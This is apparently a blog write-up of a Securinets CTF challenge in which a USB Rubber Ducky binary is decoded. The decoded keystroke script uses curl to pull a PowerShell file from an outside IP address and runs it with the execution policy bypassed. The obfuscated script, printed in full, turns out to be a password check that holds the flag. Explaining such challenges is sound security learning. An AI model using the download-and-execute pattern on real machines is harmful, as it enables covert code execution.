I"íD<h2 id="exercise">Exercise</h2>

<blockquote>
  <p>Do you know someone who loves hunting ducks?
Link: http://for.ctfsecurinets.com/8/unknown.bin</p>
</blockquote>

<p><img src="/assets/images/2018-03-26-Securinets-CTF-duck-hunt-300/exercise.png" alt="" /></p>
<p align="center">[Í∑∏Î¶º] exercise</p>

<h2 id="solution">Solution</h2>

<p>You can download a binary called ‚Äúunknown.bin‚Äù. After download the ‚Äúunknown.bin‚Äù, that is look like dummy binary.</p>

<p>you need to know ‚Äúduck‚Äù in exercise. that is ‚Äúducky‚Äù. ducky, which uses the mcu chip for usb and performs common operations, uses the result of the compilation ‚Äúinject.bin‚Äù.(more important : ‚Äúhttps://hakshop.com/products/usb-rubber-ducky-deluxe‚Äù)</p>

<p>below site, you can decode that binary. ‚Äúhttps://ducktoolkit.com/decoder/‚Äù
<img src="/assets/images/2018-03-26-Securinets-CTF-duck-hunt-300/decode.png" alt="" /></p>
<p align="center">[Í∑∏Î¶º] decode site</p>

<p>After Binary file decode, you can see that original ‚Äúducky code‚Äù.
<img src="/assets/images/2018-03-26-Securinets-CTF-duck-hunt-300/decode_file.png" alt="" /></p>
<p align="center">[Í∑∏Î¶º] original ducky code</p>

<p>This is ducky code. you can see ‚Äúhttp://34.240.44.38/payload.txt‚Äù about ‚ÄúGET url‚Äù.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>DELAY
ADELAY
DELAY
DELAY
<span class="nb">cd</span> / &amp; <span class="nb">mkdir</span> .haxor &amp; <span class="nb">cd</span> .haxor &amp; <span class="nb">echo</span> <span class="o">(</span>curl <span class="nt">-X</span> GET  http://34.240.44.38/payload.txt<span class="o">)</span> <span class="o">&gt;</span> file.PS1 &amp; powershell <span class="nt">-ExecutionPolicy</span> ByPass <span class="nt">-File</span> file.ps1
DELAY

</code></pre></div></div>

<p>You can tell from the payload.txt that it is a powershell script, and seems to have a simple obfuscation. Nothing is a problem. This is ‚Äúpayload.txt‚Äù (powershell script)</p>
<div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">${;}</span><span class="o">=+</span><span class="err">$</span><span class="p">();</span><span class="w">
</span><span class="nv">${=}</span><span class="o">=</span><span class="nv">${;}</span><span class="p">;</span><span class="w">
</span><span class="nv">${+}</span><span class="o">=++</span><span class="nv">${;}</span><span class="p">;</span><span class="w">
</span><span class="nv">${@}</span><span class="o">=++</span><span class="nv">${;}</span><span class="p">;</span><span class="w">
</span><span class="nv">${.}</span><span class="o">=++</span><span class="nv">${;}</span><span class="p">;</span><span class="w">
</span><span class="nv">${[}</span><span class="o">=++</span><span class="nv">${;}</span><span class="p">;</span><span class="w">
</span><span class="nf">\n</span><span class="nv">${]}</span><span class="o">=++</span><span class="nv">${;}</span><span class="p">;</span><span class="w">
</span><span class="nv">${(}</span><span class="o">=++</span><span class="nv">${;}</span><span class="p">;</span><span class="w">
</span><span class="nv">${)}</span><span class="o">=++</span><span class="nv">${;}</span><span class="p">;</span><span class="w">
</span><span class="nv">${&amp;}</span><span class="o">=++</span><span class="nv">${;}</span><span class="p">;</span><span class="w">
</span><span class="nv">${|}</span><span class="o">=++</span><span class="nv">${;}</span><span class="p">;</span><span class="w">
</span><span class="nv">${"}</span><span class="o">=</span><span class="s2">"["</span><span class="o">+</span><span class="s2">"</span><span class="si">$(</span><span class="p">@{}</span><span class="si">)</span><span class="s2">"</span><span class="p">[</span><span class="nv">${)}</span><span class="p">]</span><span class="o">+</span><span class="s2">"</span><span class="si">$(</span><span class="p">@{}</span><span class="si">)</span><span class="s2">"</span><span class="p">[</span><span class="s2">"</span><span class="nv">${+}${|}</span><span class="s2">"</span><span class="p">]</span><span class="o">+</span><span class="s2">"</span><span class="si">$(</span><span class="p">@{}</span><span class="si">)</span><span class="s2">"</span><span class="p">[</span><span class="s2">"</span><span class="nv">${@}${=}</span><span class="s2">"</span><span class="p">]</span><span class="o">+</span><span class="s2">"</span><span class="bp">$?</span><span class="s2">"</span><span class="p">[</span><span class="nv">${+}</span><span class="p">]</span><span class="o">+</span><span class="s2">"]"</span><span class="p">;</span><span class="w">
</span><span class="nv">${;}</span><span class="o">=</span><span class="s2">""</span><span class="o">.</span><span class="p">(</span><span class="s2">"</span><span class="si">$(</span><span class="p">@{}</span><span class="si">)</span><span class="s2">"</span><span class="p">[</span><span class="s2">"</span><span class="nv">${+}${[}</span><span class="s2">"</span><span class="p">]</span><span class="o">+</span><span class="s2">"</span><span class="si">$(</span><span class="p">@{}</span><span class="si">)</span><span class="s2">"</span><span class="p">[</span><span class="s2">"</span><span class="nv">${+}${(}</span><span class="s2">"</span><span class="p">]</span><span class="o">+</span><span class="s2">"</span><span class="si">$(</span><span class="p">@{}</span><span class="si">)</span><span class="s2">"</span><span class="p">[</span><span class="nv">${=}</span><span class="p">]</span><span class="o">+</span><span class="s2">"</span><span class="si">$(</span><span class="p">@{}</span><span class="si">)</span><span class="s2">"</span><span class="p">[</span><span class="nv">${[}</span><span class="p">]</span><span class="o">+</span><span class="s2">"</span><span class="bp">$?</span><span class="s2">"</span><span class="p">[</span><span class="nv">${+}</span><span class="p">]</span><span class="o">+</span><span class="s2">"</span><span class="si">$(</span><span class="p">@{}</span><span class="si">)</span><span class="s2">"</span><span class="p">[</span><span class="nv">${.}</span><span class="p">]);</span><span class="w">
</span><span class="nv">${;}</span><span class="o">=</span><span class="s2">"</span><span class="si">$(</span><span class="p">@{}</span><span class="si">)</span><span class="s2">"</span><span class="p">[</span><span class="s2">"</span><span class="nv">${+}${[}</span><span class="s2">"</span><span class="p">]</span><span class="o">+</span><span class="s2">"</span><span class="si">$(</span><span class="p">@{}</span><span class="si">)</span><span class="s2">"</span><span class="p">[</span><span class="nv">${[}</span><span class="p">]</span><span class="w">
</span><span class="s2">"</span><span class="nv">${"}${.}${(}</span><span class="s2">+</span><span class="nv">${"}${+}${=}${@}</span><span class="s2">+</span><span class="nv">${"}${+}${=}${&amp;}</span><span class="s2">+</span><span class="nv">${"}${|}${)}</span><span class="s2">+</span><span class="nv">${"}${+}${=}${.}</span><span class="s2">+</span><span class="nv">${"}${(}${+}</span><span class="s2">+</span><span class="nv">${"}${&amp;}${@}</span><span class="s2">+</span><span class="nv">${"}${+}${=}${+}</span><span class="s2">+</span><span class="nv">${"}${|}${)}</span><span class="s2">+</span><span class="nv">${"}${+}${=}${=}</span><span class="s2">+</span><span class="nv">${"}${[}${]}</span><span class="s2">+</span><span class="nv">${"}${)}${@}</span><span class="s2">+</span><span class="nv">${"}${+}${+}${+}</span><span class="s2">+</span><span class="nv">${"}${+}${+}${]}</span><span class="s2">+</span><span class="nv">${"}${+}${+}${(}</span><span class="s2">+</span><span class="nv">${"}${.}${@}</span><span class="s2">+</span><span class="nv">${"}${[}${]}</span><span class="s2">+</span><span class="nv">${"}${&amp;}${=}</span><span class="s2">+</span><span class="nv">${"}${+}${+}${[}</span><span class="s2">+</span><span class="nv">${"}${+}${+}${+}</span><span class="s2">+</span><span class="nv">${"}${+}${=}${|}</span><span class="s2">+</span><span class="nv">${"}${+}${+}${@}</span><span class="s2">+</span><span class="nv">${"}${+}${+}${(}</span><span class="s2">+</span><span class="nv">${"}${.}${@}</span><span class="s2">+</span><span class="nv">${"}${.}${|}</span><span class="s2">+</span><span class="nv">${"}${(}${|}</span><span class="s2">+</span><span class="nv">${"}${+}${+}${=}</span><span class="s2">+</span><span class="nv">${"}${+}${+}${(}</span><span class="s2">+</span><span class="nv">${"}${+}${=}${+}</span><span class="s2">+</span><span class="nv">${"}${+}${+}${[}</span><span class="s2">+</span><span class="nv">${"}${.}${@}</span><span class="s2">+</span><span class="nv">${"}${+}${+}${(}</span><span class="s2">+</span><span class="nv">${"}${+}${=}${[}</span><span class="s2">+</span><span class="nv">${"}${+}${=}${+}</span><span class="s2">+</span><span class="nv">${"}${.}${@}</span><span class="s2">+</span><span class="nv">${"}${+}${+}${@}</span><span class="s2">+</span><span class="nv">${"}${|}${)}</span><span class="s2">+</span><span class="nv">${"}${+}${+}${]}</span><span class="s2">+</span><span class="nv">${"}${+}${+}${]}</span><span class="s2">+</span><span class="nv">${"}${+}${+}${|}</span><span class="s2">+</span><span class="nv">${"}${+}${+}${+}</span><span class="s2">+</span><span class="nv">${"}${+}${+}${[}</span><span class="s2">+</span><span class="nv">${"}${+}${=}${=}</span><span class="s2">+</span><span class="nv">${"}${.}${|}</span><span class="s2">+</span><span class="nv">${"}${+}${.}</span><span class="s2">+</span><span class="nv">${"}${+}${=}</span><span class="s2">+</span><span class="nv">${"}${)}${.}</span><span class="s2">+</span><span class="nv">${"}${+}${=}${@}</span><span class="s2">+</span><span class="nv">${"}${[}${=}</span><span class="s2">+</span><span class="nv">${"}${+}${=}${@}</span><span class="s2">+</span><span class="nv">${"}${+}${=}${&amp;}</span><span class="s2">+</span><span class="nv">${"}${|}${)}</span><span class="s2">+</span><span class="nv">${"}${+}${=}${.}</span><span class="s2">+</span><span class="nv">${"}${.}${@}</span><span class="s2">+</span><span class="nv">${"}${[}${]}</span><span class="s2">+</span><span class="nv">${"}${+}${=}${+}</span><span class="s2">+</span><span class="nv">${"}${+}${+}${.}</span><span class="s2">+</span><span class="nv">${"}${.}${@}</span><span class="s2">+</span><span class="nv">${"}${.}${|}</span><span class="s2">+</span><span class="nv">${"}${)}${=}</span><span class="s2">+</span><span class="nv">${"}${+}${=}${&amp;}</span><span class="s2">+</span><span class="nv">${"}${|}${)}</span><span class="s2">+</span><span class="nv">${"}${+}${=}${.}</span><span class="s2">+</span><span class="nv">${"}${+}${@}${.}</span><span class="s2">+</span><span class="nv">${"}${+}${=}${]}</span><span class="s2">+</span><span class="nv">${"}${+}${+}${]}</span><span class="s2">+</span><span class="nv">${"}${|}${]}</span><span class="s2">+</span><span class="nv">${"}${|}${)}</span><span class="s2">+</span><span class="nv">${"}${|}${]}</span><span class="s2">+</span><span class="nv">${"}${+}${+}${[}</span><span class="s2">+</span><span class="nv">${"}${+}${+}${)}</span><span class="s2">+</span><span class="nv">${"}${|}${&amp;}</span><span class="s2">+</span><span class="nv">${"}${|}${&amp;}</span><span class="s2">+</span><span class="nv">${"}${+}${=}${+}</span><span class="s2">+</span><span class="nv">${"}${+}${+}${[}</span><span class="s2">+</span><span class="nv">${"}${|}${]}</span><span class="s2">+</span><span class="nv">${"}${+}${=}${=}</span><span class="s2">+</span><span class="nv">${"}${+}${+}${)}</span><span class="s2">+</span><span class="nv">${"}${|}${|}</span><span class="s2">+</span><span class="nv">${"}${+}${=}${)}</span><span class="s2">+</span><span class="nv">${"}${+}${@}${+}</span><span class="s2">+</span><span class="nv">${"}${|}${]}</span><span class="s2">+</span><span class="nv">${"}${+}${+}${)}</span><span class="s2">+</span><span class="nv">${"}${+}${+}${]}</span><span class="s2">+</span><span class="nv">${"}${+}${=}${+}</span><span class="s2">+</span><span class="nv">${"}${+}${=}${=}</span><span class="s2">+</span><span class="nv">${"}${|}${]}</span><span class="s2">+</span><span class="nv">${"}${+}${+}${]}</span><span class="s2">+</span><span class="nv">${"}${+}${+}${+}</span><span class="s2">+</span><span class="nv">${"}${+}${=}${|}</span><span class="s2">+</span><span class="nv">${"}${+}${=}${+}</span><span class="s2">+</span><span class="nv">${"}${+}${+}${|}</span><span class="s2">+</span><span class="nv">${"}${+}${=}${[}</span><span class="s2">+</span><span class="nv">${"}${+}${=}${+}</span><span class="s2">+</span><span class="nv">${"}${+}${+}${[}</span><span class="s2">+</span><span class="nv">${"}${+}${=}${+}</span><span class="s2">+</span><span class="nv">${"}${.}${.}</span><span class="s2">+</span><span class="nv">${"}${+}${@}${]}</span><span class="s2">+</span><span class="nv">${"}${.}${|}</span><span class="s2">+</span><span class="nv">${"}${[}${+}</span><span class="s2">+</span><span class="nv">${"}${+}${@}${.}</span><span class="s2">+</span><span class="nv">${"}${+}${.}</span><span class="s2">+</span><span class="nv">${"}${+}${=}</span><span class="s2">+</span><span class="nv">${"}${|}</span><span class="s2">+</span><span class="nv">${"}${&amp;}${)}</span><span class="s2">+</span><span class="nv">${"}${+}${+}${[}</span><span class="s2">+</span><span class="nv">${"}${+}${=}${]}</span><span class="s2">+</span><span class="nv">${"}${+}${+}${(}</span><span class="s2">+</span><span class="nv">${"}${+}${=}${+}</span><span class="s2">+</span><span class="nv">${"}${[}${]}</span><span class="s2">+</span><span class="nv">${"}${)}${@}</span><span class="s2">+</span><span class="nv">${"}${+}${+}${+}</span><span class="s2">+</span><span class="nv">${"}${+}${+}${]}</span><span class="s2">+</span><span class="nv">${"}${+}${+}${(}</span><span class="s2">+</span><span class="nv">${"}${.}${@}</span><span class="s2">+</span><span class="nv">${"}${.}${|}</span><span class="s2">+</span><span class="nv">${"}${)}${+}</span><span class="s2">+</span><span class="nv">${"}${+}${+}${+}</span><span class="s2">+</span><span class="nv">${"}${+}${+}${+}</span><span class="s2">+</span><span class="nv">${"}${+}${=}${=}</span><span class="s2">+</span><span class="nv">${"}${.}${@}</span><span class="s2">+</span><span class="nv">${"}${)}${[}</span><span class="s2">+</span><span class="nv">${"}${+}${+}${+}</span><span class="s2">+</span><span class="nv">${"}${|}${&amp;}</span><span class="s2">+</span><span class="nv">${"}${.}${.}</span><span class="s2">+</span><span class="nv">${"}${.}${|}</span><span class="s2">+</span><span class="nv">${"}${]}${|}</span><span class="s2">+</span><span class="nv">${"}${+}${.}</span><span class="s2">+</span><span class="nv">${"}${+}${=}</span><span class="s2">+</span><span class="nv">${"}${|}</span><span class="s2">+</span><span class="nv">${"}${&amp;}${)}</span><span class="s2">+</span><span class="nv">${"}${+}${+}${[}</span><span class="s2">+</span><span class="nv">${"}${+}${=}${]}</span><span class="s2">+</span><span class="nv">${"}${+}${+}${(}</span><span class="s2">+</span><span class="nv">${"}${+}${=}${+}</span><span class="s2">+</span><span class="nv">${"}${[}${]}</span><span class="s2">+</span><span class="nv">${"}${)}${@}</span><span class="s2">+</span><span class="nv">${"}${+}${+}${+}</span><span class="s2">+</span><span class="nv">${"}${+}${+}${]}</span><span class="s2">+</span><span class="nv">${"}${+}${+}${(}</span><span class="s2">+</span><span class="nv">${"}${.}${@}</span><span class="s2">+</span><span class="nv">${"}${.}${[}</span><span class="s2">+</span><span class="nv">${"}${.}${(}</span><span class="s2">+</span><span class="nv">${"}${+}${=}${@}</span><span class="s2">+</span><span class="nv">${"}${+}${=}${&amp;}</span><span class="s2">+</span><span class="nv">${"}${|}${)}</span><span class="s2">+</span><span class="nv">${"}${+}${=}${.}</span><span class="s2">+</span><span class="nv">${"}${.}${[}</span><span class="s2">+</span><span class="nv">${"}${+}${.}</span><span class="s2">+</span><span class="nv">${"}${+}${=}</span><span class="s2">+</span><span class="nv">${"}${+}${@}${]}</span><span class="s2">"</span><span class="w">
</span></code></pre></div></div>

<p>Unpacking is simple. Just run it in powershell as it‚Äôs written in payload.
<img src="/assets/images/2018-03-26-Securinets-CTF-duck-hunt-300/run.png" alt="" /></p>
<p align="center">[Í∑∏Î¶º] powershell run</p>

<p>If ‚Äú[CHar]‚Äù type values are output, the user can get the input value and check the comparison code. Within that code we can get the flag.</p>

<p><img src="/assets/images/2018-03-26-Securinets-CTF-duck-hunt-300/type.png" alt="" /></p>
<p align="center">[Í∑∏Î¶º] result of run</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$flag</span> <span class="o">=</span> Read-Host-Prompt <span class="s1">'Enter the password'</span>
If <span class="o">(</span>flag <span class="nt">-eq</span> <span class="s1">'Flag{is_a_rubber_ducky_used_somewhere!}'</span>
</code></pre></div></div>
<p><img src="/assets/images/2018-03-26-Securinets-CTF-duck-hunt-300/flag.png" alt="" /></p>
<p align="center">[Í∑∏Î¶º] flag</p>

<p align="right"><strong>Flag{is_a_rubber_ducky_used_somewhere!}</strong></p>
:ET